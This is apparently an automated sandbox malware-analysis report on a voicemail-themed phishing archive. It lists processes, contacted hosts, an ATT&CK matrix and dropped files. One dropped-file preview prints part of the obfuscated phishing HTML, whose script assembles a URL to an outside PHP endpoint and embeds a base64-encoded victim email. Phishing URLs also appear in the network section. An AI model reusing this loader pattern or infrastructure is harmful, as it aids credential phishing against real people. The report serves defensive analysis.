          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid AccountsWindows Management Instrumentation1
          Scripting          		1
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Process Discovery          		Remote ServicesData from Local System2
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Registry Run Keys / Startup Folder          		1
          Registry Run Keys / Startup Folder          		1
          Process Injection          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		Security Account Manager13
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Extra Window Memory Injection          		1
          Rundll32          		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Extra Window Memory Injection          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.google.com0%VirustotalBrowse
          a.nel.cloudflare.com0%VirustotalBrowse
          cdnjs.cloudflare.com0%VirustotalBrowse
          kisswire.com0%VirustotalBrowse
          code.jquery.com1%VirustotalBrowse
          challenges.cloudflare.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htm0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          a.nel.cloudflare.com
          		35.190.80.1
          		truefalseunknown
          sparkqueste.com.ru
          		188.114.96.3
          		truetrue
            		unknown
            code.jquery.com
            		151.101.130.137
            		truefalseunknown
            kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev
            		172.66.44.101
            		truefalse
              		unknown
              cdnjs.cloudflare.com
              		104.17.25.14
              		truetrueunknown
              kisswire.com
              		192.185.24.13
              		truefalseunknown
              challenges.cloudflare.com
              		104.18.95.41
              		truefalseunknown
              www.google.com
              		142.250.186.132
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=true
                		unknown
                https://kisswire.com/fthjx.phptrue
                  		unknown
                  file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htmfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ng22g/0x4AAAAAAAgrXiMAcsuVEmT-/auto/fbE/normal/auto/false
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    52.113.194.132
                    		unknownUnited States
                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    172.66.44.101
                    		kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.devUnited States
                    		13335CLOUDFLARENETUSfalse
                    20.189.173.5
                    		unknownUnited States
                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    173.194.76.84
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    104.18.95.41
                    		challenges.cloudflare.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    151.101.130.137
                    		code.jquery.comUnited States
                    		54113FASTLYUSfalse
                    172.66.47.155
                    		unknownUnited States
                    		13335CLOUDFLARENETUSfalse
                    239.255.255.250
                    		unknownReserved
                    		unknownunknownfalse
                    188.114.97.3
                    		unknownEuropean Union
                    		13335CLOUDFLARENETUSfalse
                    52.109.28.47
                    		unknownUnited States
                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    2.19.126.160
                    		unknownEuropean Union
                    		16625AKAMAI-ASUSfalse
                    192.185.24.13
                    		kisswire.comUnited States
                    		46606UNIFIEDLAYER-AS-1USfalse
                    188.114.96.3
                    		sparkqueste.com.ruEuropean Union
                    		13335CLOUDFLARENETUStrue
                    142.250.186.132
                    		www.google.comUnited States
                    		15169GOOGLEUSfalse
                    142.250.186.110
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    35.190.80.1
                    		a.nel.cloudflare.comUnited States
                    		15169GOOGLEUSfalse
                    172.217.18.99
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    52.109.76.240
                    		unknownUnited States
                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    104.17.25.14
                    		cdnjs.cloudflare.comUnited States
                    		13335CLOUDFLARENETUStrue
                    52.109.76.144
                    		unknownUnited States
                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    13.74.129.92
                    		unknownUnited States
                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                    Private

                    IP
                    192.168.2.16

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1489929
                    Start date and time:2024-08-08 12:03:53 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:19
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    Analysis Mode:stream
                    Analysis stop reason:Timeout
                    Sample name:You_missed_a_VM _Transcription_Available_Play_Now.zip
                    Detection:MAL
                    Classification:mal72.phis.winZIP@23/25@34/100
                    Cookbook Comments:
                    • Found application associated with file extension: .zip

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 52.109.28.47, 2.19.126.160, 2.19.126.151
                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetValueKey calls found.

                    LLM Input / Output

                    InputOutput
                    URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htm Model: jbxai
                    {"error":"[Errno 111] Connection refused"}
                    URL: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= Model: jbxai
                    {"error":"[Errno 111] Connection refused"}
                    URL: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= Model: jbxai
                    {"error":"[Errno 111] Connection refused"}
                    URL: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= Model: jbxai
                    {"error":"[Errno 111] Connection refused"}

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                    Download File
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):231348
                    Entropy (8bit):4.3859865829480515
                    Encrypted:false
                    SSDEEP:
                    MD5:78349881C816CE02FBA95ADB3F88FF22
                    SHA1:879EFEE651AF7E2FCDC8E814A3948BE32B924BBA
                    SHA-256:C882451B0C504F180EFC257B53C3725EE590A0B0B2AD25F0104A4C2700915D2D
                    SHA-512:24D43758392977717CF2260930D78AA4597E6805D03494B37F057BADC62C72A57900A77C3E4965143EBF4920C3367505F5A916AA0767F4F191A8B5FA1E6AD4A3
                    Malicious:false
                    Reputation:unknown
                    Preview:TH02...... .._bOz.......SM01X...,.....TOz...........IPM.Activity...........h...............h............H..h..^.....a.F....h............H..h\cal ...pDat...h....0.....^....h..............h........_`Gk...h....@...I.lw...h....H...8.Lk...0....T...............d.........2h...............kf.i.....-.E...!h.............. hC.......(.^...#h....8.........$h........8....."h0`......@b....'h..............1h...<.........0h....4....Lk../h....h.....LkH..hp...p.....^...-h .......T.^...+hY........^................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin

                    Download File
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:dropped
                    Size (bytes):322260
                    Entropy (8bit):4.000299760592446
                    Encrypted:false
                    SSDEEP:
                    MD5:CC90D669144261B198DEAD45AA266572
                    SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                    SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                    SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                    Malicious:false
                    Reputation:unknown
                    Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin

                    Download File
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):10
                    Entropy (8bit):2.1609640474436813
                    Encrypted:false
                    SSDEEP:
                    MD5:65CE9202546CD7630D3A5E8DDDCFB2F2
                    SHA1:091393E711816D6F7CA34BF8DED1BA67BF7C3C7A
                    SHA-256:0804850B421D5C6C9622F2BED9A90ED47747C6953674B7674868F1C78A022C95
                    SHA-512:E81A4EC1B5F710F2564F5A75177F2FB2A3C2565CF3F92F531D99A7E287CA25906BF7ED17BABAFACBF0A41F6BFEA4EF608CAC456910189F0CA316DA0C324BDC2A
                    Malicious:false
                    Reputation:unknown
                    Preview:1723111481

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\5C0AE15E-B7C9-4C55-A898-154805A22334

                    Download File
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):175403
                    Entropy (8bit):5.288134969885406
                    Encrypted:false
                    SSDEEP:
                    MD5:72C665D211EC5E98386ABE52AD711A18
                    SHA1:7A24D56E7F2B3A9073751787556360D25B2E1297
                    SHA-256:58CCD624EF7A3E5E7BD082761EA7BBE4F27C752FA2010550E07CC3437FDA18BA
                    SHA-512:4A26F14A07C43A3D367F3B1DB77784B515C5BCCE73ED7A2BCDF31666A7FBE76406B76316CE14D6DB4884FBC0DC037E365ED670DDD9878E3DF9E1203A6E6533FC
                    Malicious:false
                    Reputation:unknown
                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-08-08T10:04:39">.. Build: 16.0.17902.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

                    C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

                    Download File
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):4616
                    Entropy (8bit):0.1384465837476566
                    Encrypted:false
                    SSDEEP:
                    MD5:620040387917C96B8173E1F5E1E1B7DD
                    SHA1:FB33B6977982F6D41055C52F541A14C5EC984E87
                    SHA-256:1CF6A670D13BB96457C348EA3BD77379DB3AE83E258B40F92D2010C76DA6C505
                    SHA-512:88BD3D203B68524B2D24153AF9D95BE978ABBFACF3BBFA8FACA68097DF194F6055907FFF39583142A645AC169D535CFA0FCC8A0C869821106B3DA79D69997242
                    Malicious:false
                    Reputation:unknown
                    Preview:.... .c.......v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\TZUVH3C8\Voicemail Unanswered Transcriptions174911222280000000082_Vossloh (002).htm

                    Download File
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (450), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1548
                    Entropy (8bit):5.354959818413628
                    Encrypted:false
                    SSDEEP:
                    MD5:AFE80A4CF030A836A70E9B2C21292CCD
                    SHA1:D36DA811EBD1F39A213957327A9ACA4E20DFE246
                    SHA-256:6F6A087F929445FA45EAA2186648E86DA2C0D5A4B2A518A55B11BB24CEC4C2B7
                    SHA-512:F050CE5213821E5081A21964AE450CB2B73FDCF948CE7E28CD2F845B7EB445CCF9757065C14834574AFEB7FE1D8475F2D426B6A7DCC83368F7F5848B6188D7C9
                    Malicious:false
                    Reputation:unknown
                    Preview:<html>..<body>.. <span>Keep your face always toward the sunshine.and shadows will fall behind you.</span> -->.. <script>.../* We may encounter many defeats but we must not be defeated. */..... var /* Success is not how high you have climbed, but how you make a positive difference to the world. */ /* Believe you can and you.re halfway there. */ calypso = `a2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=`; let sanctification = (() => { const absolution = 57; return absolution % 2 === 0 ? 57 : 57 * 2; })();...let maintenance = "navigator" + " " + (function() { return 39 - 1; })() + "navigator";...const /* Act as if what you do makes a difference. It does. */ /* It does not matter how slowly you go as long as you do not stop. */ imago = ['https://kisswire.',`com/fthj`,`x.php?4-797967704`,'b53693230','7466507a73704954307',`44a5338346f5`,"338724b793872",`4f4166494b7934764`,`1794e54597`,`84e5459314d6a59`,'794e6855727',"94178506256","594c7957315442","3841-calypso"]; let editor = Array.from({

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\TZUVH3C8\Voicemail Unanswered Transcriptions174911222280000000082_Vossloh (002).htm:Zone.Identifier

                    Download File
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:
                    MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                    SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                    SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                    SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                    Malicious:false
                    Reputation:unknown
                    Preview:[ZoneTransfer]..ZoneId=3..

                    C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                    Download File
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):30
                    Entropy (8bit):1.2389205950315936
                    Encrypted:false
                    SSDEEP:
                    MD5:CEBAEECD1050EED659B2EDD42C4A716C
                    SHA1:AC42AFB5CBC9FCC457EFDC6FDEEA3BB871712181
                    SHA-256:C536D2CFEACF41D9272355046DF70B18A7BBCC0BDF49335E49FE5D4E6B578D57
                    SHA-512:78E80631EF5437BDAFD3AD08082A45FBF08E00EAEC95960045B0EED776D5DCE2D07B93D39F88F2CFF94F8DDCBA991B09B89020B7D50FA713B6FA311694D89A25
                    Malicious:false
                    Reputation:unknown
                    Preview:..............................

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2673
                    Entropy (8bit):3.9885580171077715
                    Encrypted:false
                    SSDEEP:
                    MD5:4717C5470DC8D71075A4C8F31658088E
                    SHA1:04DA48CE5C33D095F7C58AA0D9830EEB56830041
                    SHA-256:7803A7E507B180D8D8AAD96878014595051AFDA94809FDD9F29BEE3ACDF3C6EB
